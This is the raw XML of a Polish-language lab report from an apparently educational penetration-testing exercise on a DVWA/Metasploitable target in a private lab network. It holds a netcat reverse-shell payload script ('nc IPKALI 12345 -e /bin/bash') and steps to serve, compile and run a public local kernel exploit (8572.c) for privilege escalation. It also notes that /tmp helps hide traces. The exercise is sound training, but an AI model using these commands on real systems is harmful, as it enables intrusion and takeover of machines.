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78A0E" w14:textId="777D7F69" w:rsidR="0090246C" w:rsidRPr="001765E8" w:rsidRDefault="000C2B8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Ip meta:  10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C815CC" w14:textId="0A92393D" w:rsidR="000C2B85" w:rsidRPr="001765E8" w:rsidRDefault="000C2B85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Ip kali:  10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B57DB6" w14:textId="77777777" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="00533F84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC8EB3B" w14:textId="77777777" w:rsidR="00A34DD3" w:rsidRPr="00A34DD3" w:rsidRDefault="00A34DD3" w:rsidP="00A34DD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ZADANIE 1A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5184A" w14:textId="77777777" w:rsidR="00A34DD3" w:rsidRPr="00A34DD3" w:rsidRDefault="00A34DD3" w:rsidP="00A34DD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Proszę teraz wykorzystując podatność Command Execution wykonać połączenie przy użyciu netcat tak aby uzyskać reverse shell na uprawnieniach „wwwdata” z serwera DVWA na konsolę KALI. Na końcu opisz swoje działania oraz jak wyeliminować taką podatność, jak wykryć i zablokować taki atak. (Całość zobrazuj zrzutami ekranu z działań.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5369267C" w14:textId="77777777" w:rsidR="001D41CB" w:rsidRPr="001765E8" w:rsidRDefault="001D41CB" w:rsidP="001D41CB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KALI-terminal: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4FB67F" w14:textId="03F63AA4" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="001D41CB" w:rsidP="001D41C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nc -lvp 31337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298920A0" w14:textId="2B7482DB" w:rsidR="00A34DD3" w:rsidRPr="001765E8" w:rsidRDefault="001D41C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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCCD451" wp14:editId="6CC3A5C3">
            <wp:extent cx="5760720" cy="798830"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="14330840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E0CD" w14:textId="18F514E4" w:rsidR="00A34DD3" w:rsidRPr="001765E8" w:rsidRDefault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Uzyskaliśmy połączenie po Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E331239" w14:textId="5DD3FA10" w:rsidR="001D41CB" w:rsidRPr="001765E8" w:rsidRDefault="001D41CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B8C22E" w14:textId="7D53CE3F" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="001C710C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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131C4DB0" wp14:editId="6528806E">
            <wp:extent cx="5760720" cy="1488440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="972066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6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6E80" w14:textId="77777777" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="00533F84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5A0257" w14:textId="77777777" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="00533F84" w:rsidP="00533F84">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006FC0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006FC0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ZADANIE 1B. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286FF15" w14:textId="71189D24" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="00533F84" w:rsidP="00533F8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Wykonaj wszystkie poniższe działania i opisz je - całość zobrazuj zrzutami ekranu z działań. Napisz też jakie podatności zostały wykorzystane, jak je wyeliminować oraz jak wykryć i zablokować taki atak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32387EC0" w14:textId="77777777" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="00533F84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F949C3" w14:textId="77777777" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="00533F84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187D890D" w14:textId="70F77805" w:rsidR="00533F84" w:rsidRPr="001765E8" w:rsidRDefault="00533F8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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60C43F24" wp14:editId="5E2D3010">
            <wp:extent cx="5760720" cy="1725295"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="3585497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4487" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC4A4BC" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:pStyle w:val="Defaul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 xml:space="preserve">Mamy informacje o systemie operacyjnym, wersji, nazwie kodowej i jego kernelu a to bardzo ważna rzecz </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF0CD15" w14:textId="5797490A" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E0F857" w14:textId="77777777" w:rsidR="001C710C" w:rsidRPr="001C710C" w:rsidRDefault="001C710C" w:rsidP="001C71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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="pl-PL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:lang w:eastAsia="pl-PL"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Przygotowanie plików (Terminal 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D06A4" w14:textId="77777777" w:rsidR="001C710C" w:rsidRPr="001765E8" w:rsidRDefault="001C710C" w:rsidP="001C710C">
      <w:pPr>
        <w:pStyle w:val="NormalnyWeb"/>
        <w:rPr>
          <w:rStyle w:val="citation-2855"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F971F40" w14:textId="77777777" w:rsidR="001C710C" w:rsidRPr="001765E8" w:rsidRDefault="001C710C" w:rsidP="001C710C">
      <w:pPr>
        <w:pStyle w:val="NormalnyWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670A96D0" w14:textId="1A69A442" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault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Poszukamy teraz exploitów</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4B3A8" w14:textId="0F378660" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="602AB823" wp14:editId="03381A73">
            <wp:extent cx="5760720" cy="2555875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6465290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9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89D6" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725737F1" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A827FAE" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:pStyle w:val="Defaul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Wybieramy odpowiedniego </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4610D" w14:textId="5B691E36" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP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Linux Kernel 2.6 (Gentoo / Ubuntu 8.10 | exploits/linux/local/8572.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897ED54" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6122F6F3" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:pStyle w:val="Defaul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Podglądamy w nim co i jak – pełne informacje w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TERMINAL KALI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1568AAD0" w14:textId="77777777" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:pStyle w:val="Default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less /usr/share/exploitdb/exploits/linux/local/8572.c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4800654C" w14:textId="6B6D9B91" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP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wychodzimy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B223A29" w14:textId="19BBF352" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="001148C7" w:rsidP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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A72495C" wp14:editId="56EF477C">
            <wp:extent cx="5760720" cy="4436745"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="3222497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49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2E4D" w14:textId="3BF54136" w:rsidR="001148C7" w:rsidRPr="001765E8" w:rsidRDefault="00CA7C59" w:rsidP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Wychodzimy q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21433C88" w14:textId="7E689FF3" w:rsidR="00CA7C59" w:rsidRPr="001765E8" w:rsidRDefault="00CA7C59" w:rsidP="001148C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Włączamy Apache do wystawienia exploita – TERMINAL KALI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702985B9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#-tworzymy link symboliczny </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07794A05" w14:textId="77777777" w:rsidR="00A041BA" w:rsidRPr="001765E8" w:rsidRDefault="00A041BA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735C9B9A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sudo service apache2 restart </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664AFD01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sudo ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C532C9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0BEFB856" w14:textId="24B30B4C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PRZYGOTOWUJEMY PLIK URUCHOMIENIOWY - PAYLOAD: -&gt; TERMINAL KALI: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51513534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sudo gedit /var/www/html/run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D834D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5AB5DF2A" w14:textId="28C9AF0E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wpisujemy: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FDF80F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  <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67222F43" w14:textId="77777777" w:rsidR="00CA7C59" w:rsidRPr="001765E8" w:rsidRDefault="00CA7C59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  <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:t xml:space="preserve">nc IPKALI 12345 -e /bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B44CF" w14:textId="77777777" w:rsidR="00A041BA" w:rsidRPr="001765E8" w:rsidRDefault="00A041BA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  <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3E8083" w14:textId="0ED7B4ED" w:rsidR="00A041BA" w:rsidRPr="001765E8" w:rsidRDefault="001765E8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zapisujemy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6162AC48" w14:textId="77777777" w:rsidR="00A041BA" w:rsidRPr="001765E8" w:rsidRDefault="00A041BA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185C4338" w14:textId="77777777" w:rsidR="00A041BA" w:rsidRPr="001765E8" w:rsidRDefault="00A041BA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510CDE98" w14:textId="77777777" w:rsidR="00A041BA" w:rsidRPr="001765E8" w:rsidRDefault="00A041BA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4976506A" w14:textId="49A6C9AE" w:rsidR="00A041BA" w:rsidRPr="001765E8" w:rsidRDefault="001765E8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Wracamy do naszego uzyskanego wcześniej shell-a na niskich uprawnieniach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1211E57A" w14:textId="4942A5CC" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8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Wchodzimy do /tmp i tam ściągamy z naszego Kali przygotowane plik run i exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B13D489" w14:textId="61CD9985" w:rsidR="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8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cd /tmp  DLACZEGO ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B96368" w14:textId="77777777" w:rsidR="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8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572DF489" w14:textId="1F81F96D" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8">
      <w:pPr>
        <w:pStyle w:val="NormalnyWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="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 xml:space="preserve">Wybór katalogu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML-kod"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/tmp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podczas przeprowadzania ataku nie jest przypadkowy. W kontekście zadania i ogólnych praktyk testów penetracyjnych, oto główne powody:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B1D24" w14:textId="77777777" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8">
      <w:pPr>
        <w:pStyle w:val="Normalny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Style w:val="citation-2891"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Uprawnienia do zapisu: Katalog /tmp (temporary) jest jednym z niewielu miejsc w systemie Linux, do których każdy użytkownik — w tym www-data o niskich uprawnieniach — ma pełne prawo zapisu i wykonywania plików</w:t>
      </w:r>
      <w:r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5A699ABC" w14:textId="77777777" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8">
      <w:pPr>
        <w:pStyle w:val="Normalny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Style w:val="citation-2890"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Miejsce na exploity: Skalowanie uprawnień wymaga pobrania kodu źródłowego (np. 8572.c) i jego skompilowania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. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="citation-2889"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ponieważ jako www-data nie masz dostępu do folderów domowych innych użytkowników ani katalogów systemowych, /tmp jest idealnym "placem zabaw"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20620207" w14:textId="77777777" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8">
      <w:pPr>
        <w:pStyle w:val="Normalny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>Dyskrecja i porządek: Pliki w tym katalogu są często ignorowane przez administratorów, a wiele systemów automatycznie czyści jego zawartość przy restarcie, co pomaga zacierać ślady po zakończonym ataku.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D451CC1" w14:textId="77777777" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA5252B" w14:textId="77777777" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B364DE" w14:textId="2FC887F0" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8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Kompilacja exploita na atakowanej maszynie (dalej w shell-u na niskich uprawnieniach): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A316D2A" w14:textId="77777777" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8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 xml:space="preserve">gcc -o exploit 8572.c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2080A409" w14:textId="06726875" w:rsidR="001765E8" w:rsidRPr="001765E8" w:rsidRDefault="001765E8" w:rsidP="001765E8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4B8EA434" w14:textId="58426905" w:rsidR="00A041BA" w:rsidRDefault="001765E8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  <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="nb-NO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06C3BBF6" wp14:editId="70656DFA">
            <wp:extent cx="5760720" cy="2050415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="10575375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7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4D57" w14:textId="77777777" w:rsidR="004700EE" w:rsidRDefault="004700EE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  <w:lang w:val="nb-NO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1EFC26" w14:textId="0CAA9CC6" w:rsidR="004700EE" w:rsidRDefault="004700EE" w:rsidP="004700EE">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00AF50"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Szukany PID to jedyny niezerowy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PID (2814) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00AF50"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>0 jeden mniejszy niż PID procesu udevd odpalonego na root (2815)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="00AF50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">😊 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623D5F0A" w14:textId="61C44CE4" w:rsidR="004700EE" w:rsidRPr="004700EE" w:rsidRDefault="004700EE" w:rsidP="004700EE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b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Czyli numerkiem jest 2814 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CF2941" w14:textId="77777777" w:rsidR="004700EE" w:rsidRDefault="004700EE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1230BEA0" w14:textId="77777777" w:rsidR="004700EE" w:rsidRDefault="004700EE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6F203315" w14:textId="0118CF49" w:rsidR="004700EE" w:rsidRPr="004700EE" w:rsidRDefault="004700EE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  <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Uruchomiony Terminal 2 (nasłuchujemy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFC450A" w14:textId="77777777" w:rsidR="004700EE" w:rsidRPr="004700EE" w:rsidRDefault="004700EE" w:rsidP="00CA7C59">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1CE320" w14:textId="276EAFCD" w:rsidR="00CA7C59" w:rsidRDefault="00A041BA" w:rsidP="00CA7C5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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67891138" wp14:editId="10668629">
            <wp:extent cx="4046571" cy="1089754"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1891215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1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1A52" w14:textId="77777777" w:rsidR="004700EE" w:rsidRDefault="004700EE" w:rsidP="00CA7C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04018A50" w14:textId="77777777" w:rsidR="004700EE" w:rsidRDefault="004700EE" w:rsidP="00CA7C59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBEAAAA" w14:textId="77777777" w:rsidR="004700EE" w:rsidRDefault="004700EE" w:rsidP="004700E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Wracamy do naszego uzyskanego wcześniej shell-a na niskich uprawnieniach: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FDB73" w14:textId="2D734601" w:rsidR="004700EE" w:rsidRDefault="004700EE" w:rsidP="004700EE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./exploit 2814</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF73D5" w14:textId="77777777" w:rsidR="007C5FBC" w:rsidRDefault="007C5FBC" w:rsidP="004700EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414046D6" w14:textId="372F73A1" w:rsidR="007C5FBC" w:rsidRPr="001765E8" w:rsidRDefault="007C5FBC" w:rsidP="004700E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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3273BB8F" wp14:editId="08D57FFA">
            <wp:extent cx="5760720" cy="915670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2434135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3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FBC" w:rsidRPr="001765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5298C" w14:textId="77777777" w:rsidR="001148C7" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7DE1B25C" w14:textId="77777777" w:rsidR="001148C7" w:rsidRDefault="001148C7" w:rsidP="0011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986A" w14:textId="77777777" w:rsidR="001148C7" w:rsidRDefault="001148C7" w:rsidP="001148C7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="58DD1FF0" w14:textId="77777777" w:rsidR="001148C7" w:rsidRDefault="001148C7" w:rsidP="0011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30E47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAD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D6596"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA9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734961">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1179855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8C"/>
    <w:rsid w:val="000C2B85"/>
    <w:rsid w:val="001148C7"/>
    <w:rsid w:val="00122131"/>
    <w:rsid w:val="001765E8"/>
    <w:rsid w:val="001C710C"/>
    <w:rsid w:val="001D41CB"/>
    <w:rsid w:val="00277D8C"/>
    <w:rsid w:val="00285B1E"/>
    <w:rsid w:val="0033198E"/>
